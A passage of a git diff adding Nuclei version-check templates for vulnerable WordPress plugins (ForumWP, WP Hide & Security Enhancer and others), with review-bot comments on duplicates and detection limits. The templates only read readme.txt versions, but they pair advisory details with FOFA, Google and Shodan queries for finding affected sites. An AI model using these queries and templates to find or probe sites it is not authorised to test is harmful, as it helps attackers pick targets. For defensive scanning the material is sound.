+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.0.1')
\ No newline at end of file
diff --git a/poc/sql/vertical-carousel-slider-02cbab9c2d567c8a51e8bba1e79d8db9.yaml b/poc/sql/vertical-carousel-slider-02cbab9c2d567c8a51e8bba1e79d8db9.yaml
new file mode 100644
index 0000000000..3961057743
--- /dev/null
+++ b/poc/sql/vertical-carousel-slider-02cbab9c2d567c8a51e8bba1e79d8db9.yaml
@@ -0,0 +1,59 @@
+id: vertical-carousel-slider-02cbab9c2d567c8a51e8bba1e79d8db9
+
+info:
+ name: >
+ Vertical Carousel <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/8ae463ae-5bfb-4e7c-9f84-edaa9a826ffa?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/vertical-carousel-slider/"
+ google-query: inurl:"/wp-content/plugins/vertical-carousel-slider/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,vertical-carousel-slider,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/vertical-carousel-slider/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "vertical-carousel-slider"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/sql/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml b/poc/sql/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
new file mode 100644
index 0000000000..1776c246f3
--- /dev/null
+++ b/poc/sql/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
@@ -0,0 +1,59 @@
+id: wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67
+
+info:
+ name: >
+ WP Media Optimizer (.webp) <= 1.4.0 - Reflected Cross-Site Scripting via wpmowebp-css-resources and wpmowebp-js-resources Parameters
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/183d1be9-4c05-4107-b039-3711034ef774?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-media-optimizer-webp/"
+ google-query: inurl:"/wp-content/plugins/wp-media-optimizer-webp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-media-optimizer-webp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-media-optimizer-webp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-media-optimizer-webp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
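Review bot: This template is added three times in the commit with the same `id` and the same blob (`index 0000000000..1776c246f3`): here under `poc/sql/`, and again under `poc/web/` and `poc/wordpress/`. Loading the whole tree hands the scanner three templates with one id, which at best is deduplicated and at worst sends the request and reports the finding three times. Keep one copy (`poc/wordpress/` fits a Reflected Cross-Site Scripting issue in a WordPress plugin better than `poc/sql/`) and, if the other directories are meant as indexes, list the path there instead of copying the file.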
diff --git a/poc/web/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml b/poc/web/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
new file mode 100644
index 0000000000..1776c246f3
--- /dev/null
+++ b/poc/web/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
@@ -0,0 +1,59 @@
+id: wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67
+
+info:
+ name: >
+ WP Media Optimizer (.webp) <= 1.4.0 - Reflected Cross-Site Scripting via wpmowebp-css-resources and wpmowebp-js-resources Parameters
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/183d1be9-4c05-4107-b039-3711034ef774?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-media-optimizer-webp/"
+ google-query: inurl:"/wp-content/plugins/wp-media-optimizer-webp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-media-optimizer-webp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-media-optimizer-webp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-media-optimizer-webp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/wordpress/forumwp-aaeb37a4320ca1cfa0565e89a95a01bb.yaml b/poc/wordpress/forumwp-aaeb37a4320ca1cfa0565e89a95a01bb.yaml
new file mode 100644
index 0000000000..9c47f3a4fc
--- /dev/null
+++ b/poc/wordpress/forumwp-aaeb37a4320ca1cfa0565e89a95a01bb.yaml
@@ -0,0 +1,59 @@
+id: forumwp-aaeb37a4320ca1cfa0565e89a95a01bb
+
+info:
+ name: >
+ ForumWP – Forum & Discussion Board <= 2.1.2 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/10b3256b-5271-44b8-ab4d-05156d4f674b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/forumwp/"
+ google-query: inurl:"/wp-content/plugins/forumwp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,forumwp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/forumwp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "forumwp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.2')
\ No newline at end of file
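Review bot: This template and `forumwp-b74a371b4e61bc84d659569310ff3232.yaml` in the next section send the same request and apply the same matchers, down to `compare_versions(version, '<= 2.1.2')`; only `id`, `name` and the Wordfence reference differ. Because neither probes the parameter it names, one affected readme yields two findings that cannot be told apart by evidence. Consider a single version-check template for forumwp `<= 2.1.2` that lists both advisories under `reference`, or add a comment to each such as `# same readme.txt version check as forumwp-b74a371b4e61bc84d659569310ff3232; differs only in advisory`.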
diff --git a/poc/wordpress/forumwp-b74a371b4e61bc84d659569310ff3232.yaml b/poc/wordpress/forumwp-b74a371b4e61bc84d659569310ff3232.yaml
new file mode 100644
index 0000000000..2df2ea833a
--- /dev/null
+++ b/poc/wordpress/forumwp-b74a371b4e61bc84d659569310ff3232.yaml
@@ -0,0 +1,59 @@
+id: forumwp-b74a371b4e61bc84d659569310ff3232
+
+info:
+ name: >
+ ForumWP – Forum & Discussion Board <= 2.1.2 - Reflected Cross-Site Scripting via url Parameter
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/cd11abe3-8307-492b-beef-242fb21a4206?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/forumwp/"
+ google-query: inurl:"/wp-content/plugins/forumwp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,forumwp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/forumwp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "forumwp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.1.2')
\ No newline at end of file
diff --git a/poc/wordpress/smart-marketing-for-wp-9730906988033bfae8062aec3f96a7aa.yaml b/poc/wordpress/smart-marketing-for-wp-9730906988033bfae8062aec3f96a7aa.yaml
new file mode 100644
index 0000000000..cc1baaa011
--- /dev/null
+++ b/poc/wordpress/smart-marketing-for-wp-9730906988033bfae8062aec3f96a7aa.yaml
@@ -0,0 +1,59 @@
+id: smart-marketing-for-wp-9730906988033bfae8062aec3f96a7aa
+
+info:
+ name: >
+ Smart Marketing SMS and Newsletters Forms <= 5.0.9 - Missing Authorization
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6125a734-c185-4a97-a4fe-a739aa20de13?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/smart-marketing-for-wp/"
+ google-query: inurl:"/wp-content/plugins/smart-marketing-for-wp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,smart-marketing-for-wp,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/smart-marketing-for-wp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "smart-marketing-for-wp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.0.9')
\ No newline at end of file
diff --git a/poc/wordpress/threewp-broadcast-82473e0c5aa4cc508b6700e7d6fff64e.yaml b/poc/wordpress/threewp-broadcast-82473e0c5aa4cc508b6700e7d6fff64e.yaml
new file mode 100644
index 0000000000..b6607a67f0
--- /dev/null
+++ b/poc/wordpress/threewp-broadcast-82473e0c5aa4cc508b6700e7d6fff64e.yaml
@@ -0,0 +1,59 @@
+id: threewp-broadcast-82473e0c5aa4cc508b6700e7d6fff64e
+
+info:
+ name: >
+ Broadcast <= 51.01 - Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/e9bf506f-17b1-4ec3-87ce-1ed78db6fb0b?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/threewp-broadcast/"
+ google-query: inurl:"/wp-content/plugins/threewp-broadcast/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,threewp-broadcast,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/threewp-broadcast/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "threewp-broadcast"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 51.01')
\ No newline at end of file
diff --git a/poc/wordpress/video-player-for-wpbakery-9c2d47674bd034385887846ea596ce8b.yaml b/poc/wordpress/video-player-for-wpbakery-9c2d47674bd034385887846ea596ce8b.yaml
new file mode 100644
index 0000000000..0e5db922df
--- /dev/null
+++ b/poc/wordpress/video-player-for-wpbakery-9c2d47674bd034385887846ea596ce8b.yaml
@@ -0,0 +1,59 @@
+id: video-player-for-wpbakery-9c2d47674bd034385887846ea596ce8b
+
+info:
+ name: >
+ Video Player for WPBakery <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ee992216-53dd-441e-9c8f-55fbe7567cb7?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/video-player-for-wpbakery/"
+ google-query: inurl:"/wp-content/plugins/video-player-for-wpbakery/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,video-player-for-wpbakery,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/video-player-for-wpbakery/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "video-player-for-wpbakery"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/wordpress/wp-find-your-nearest-52e62929115acbdac3eec0fd5a13d231.yaml b/poc/wordpress/wp-find-your-nearest-52e62929115acbdac3eec0fd5a13d231.yaml
new file mode 100644
index 0000000000..c98699c592
--- /dev/null
+++ b/poc/wordpress/wp-find-your-nearest-52e62929115acbdac3eec0fd5a13d231.yaml
@@ -0,0 +1,59 @@
+id: wp-find-your-nearest-52e62929115acbdac3eec0fd5a13d231
+
+info:
+ name: >
+ WP Find Your Nearest <= 0.3.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/f348e019-d4b5-4384-8ee9-117694259b92?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-find-your-nearest/"
+ google-query: inurl:"/wp-content/plugins/wp-find-your-nearest/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-find-your-nearest,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-find-your-nearest/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-find-your-nearest"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 0.3.1')
\ No newline at end of file
diff --git a/poc/wordpress/wp-hide-security-enhancer-94f0ee6838b2f0b8be9cc18455fff889.yaml b/poc/wordpress/wp-hide-security-enhancer-94f0ee6838b2f0b8be9cc18455fff889.yaml
new file mode 100644
index 0000000000..ba058803ad
--- /dev/null
+++ b/poc/wordpress/wp-hide-security-enhancer-94f0ee6838b2f0b8be9cc18455fff889.yaml
@@ -0,0 +1,59 @@
+id: wp-hide-security-enhancer-94f0ee6838b2f0b8be9cc18455fff889
+
+info:
+ name: >
+ WP Hide & Security Enhancer <= 2.5.1 - Missing Authorization to Unauthenticated Arbitrary File Contents Deletion
+ author: topscoder
+ severity: high
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/43c7056e-39d8-467e-92ec-33a31e5dafc9?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-hide-security-enhancer/"
+ google-query: inurl:"/wp-content/plugins/wp-hide-security-enhancer/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-hide-security-enhancer,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-hide-security-enhancer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.5.1')
\ No newline at end of file
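Review bot: The check depends on `/wp-content/plugins/wp-hide-security-enhancer/readme.txt` being reachable at its default path, which is doubtful for a plugin whose name says it hides WordPress paths (inferred from the name; the template shows nothing about the plugin's behaviour). On such a site the status or word matcher fails and the scan stays silent, so a clean result for this `high` advisory must not be read as "patched". I would record that limit in `description`, e.g. `No match does not rule out the plugin: sites that rewrite or block plugin paths will not serve this readme.`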
diff --git a/poc/wordpress/wp-mathjax-plus-178bdd1913c816f82e7f19af89ce62f9.yaml b/poc/wordpress/wp-mathjax-plus-178bdd1913c816f82e7f19af89ce62f9.yaml
new file mode 100644
index 0000000000..8e57505610
--- /dev/null
+++ b/poc/wordpress/wp-mathjax-plus-178bdd1913c816f82e7f19af89ce62f9.yaml
@@ -0,0 +1,59 @@
+id: wp-mathjax-plus-178bdd1913c816f82e7f19af89ce62f9
+
+info:
+ name: >
+ WP MathJax <= 1.0.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2b0bb89c-6c56-4037-8a55-487244e8d519?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-mathjax-plus/"
+ google-query: inurl:"/wp-content/plugins/wp-mathjax-plus/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-mathjax-plus,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-mathjax-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-mathjax-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.1')
\ No newline at end of file
diff --git a/poc/wordpress/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml b/poc/wordpress/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
new file mode 100644
index 0000000000..1776c246f3
--- /dev/null
+++ b/poc/wordpress/wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67.yaml
@@ -0,0 +1,59 @@
+id: wp-media-optimizer-webp-db74fce5b7adcf6651896f57aad35a67
+
+info:
+ name: >
+ WP Media Optimizer (.webp) <= 1.4.0 - Reflected Cross-Site Scripting via wpmowebp-css-resources and wpmowebp-js-resources Parameters
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/183d1be9-4c05-4107-b039-3711034ef774?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-media-optimizer-webp/"
+ google-query: inurl:"/wp-content/plugins/wp-media-optimizer-webp/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-media-optimizer-webp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-media-optimizer-webp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-media-optimizer-webp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.0')
\ No newline at end of file
diff --git a/poc/wordpress/wp-mermaid-384c0a7cc618fb29d85738396ef5ac01.yaml b/poc/wordpress/wp-mermaid-384c0a7cc618fb29d85738396ef5ac01.yaml
new file mode 100644
index 0000000000..2b4a2d1265
--- /dev/null
+++ b/poc/wordpress/wp-mermaid-384c0a7cc618fb29d85738396ef5ac01.yaml
@@ -0,0 +1,59 @@
+id: wp-mermaid-384c0a7cc618fb29d85738396ef5ac01
+
+info:
+ name: >
+ WP Mermaid <= 1.0.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/44a62dd2-539a-4d9a-a32e-f935aa1d0d58?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-mermaid/"
+ google-query: inurl:"/wp-content/plugins/wp-mermaid/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-mermaid,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-mermaid/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-mermaid"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
diff --git a/poc/wordpress/wp-private-content-plus-77641909bd19731b0b84338bb1bae5f0.yaml b/poc/wordpress/wp-private-content-plus-77641909bd19731b0b84338bb1bae5f0.yaml
new file mode 100644
index 0000000000..cd895b277b
--- /dev/null
+++ b/poc/wordpress/wp-private-content-plus-77641909bd19731b0b84338bb1bae5f0.yaml
@@ -0,0 +1,59 @@
+id: wp-private-content-plus-77641909bd19731b0b84338bb1bae5f0
+
+info:
+ name: >
+ WP Private Content Plus <= 3.6.1 - Unauthenticated Content Restriction Bypass to Sensitive Information Exposure
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/30c46b91-e371-480f-943a-3906d8b6bbba?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-private-content-plus/"
+ google-query: inurl:"/wp-content/plugins/wp-private-content-plus/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-private-content-plus,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-private-content-plus/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-private-content-plus"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.6.1')
\ No newline at end of file
diff --git a/poc/wordpress/wp-system-06fc769dd5f956e0682bf74af252b00f.yaml b/poc/wordpress/wp-system-06fc769dd5f956e0682bf74af252b00f.yaml
new file mode 100644
index 0000000000..3cbf1ca89b
--- /dev/null
+++ b/poc/wordpress/wp-system-06fc769dd5f956e0682bf74af252b00f.yaml
@@ -0,0 +1,59 @@
+id: wp-system-06fc769dd5f956e0682bf74af252b00f
+
+info:
+ name: >
+ WP System <= 1.1.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/05bb119f-06e4-4f56-afc8-0c5a25266b02?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/wp-system/"
+ google-query: inurl:"/wp-content/plugins/wp-system/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,wp-system,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-system/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wp-system"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.1')
\ No newline at end of file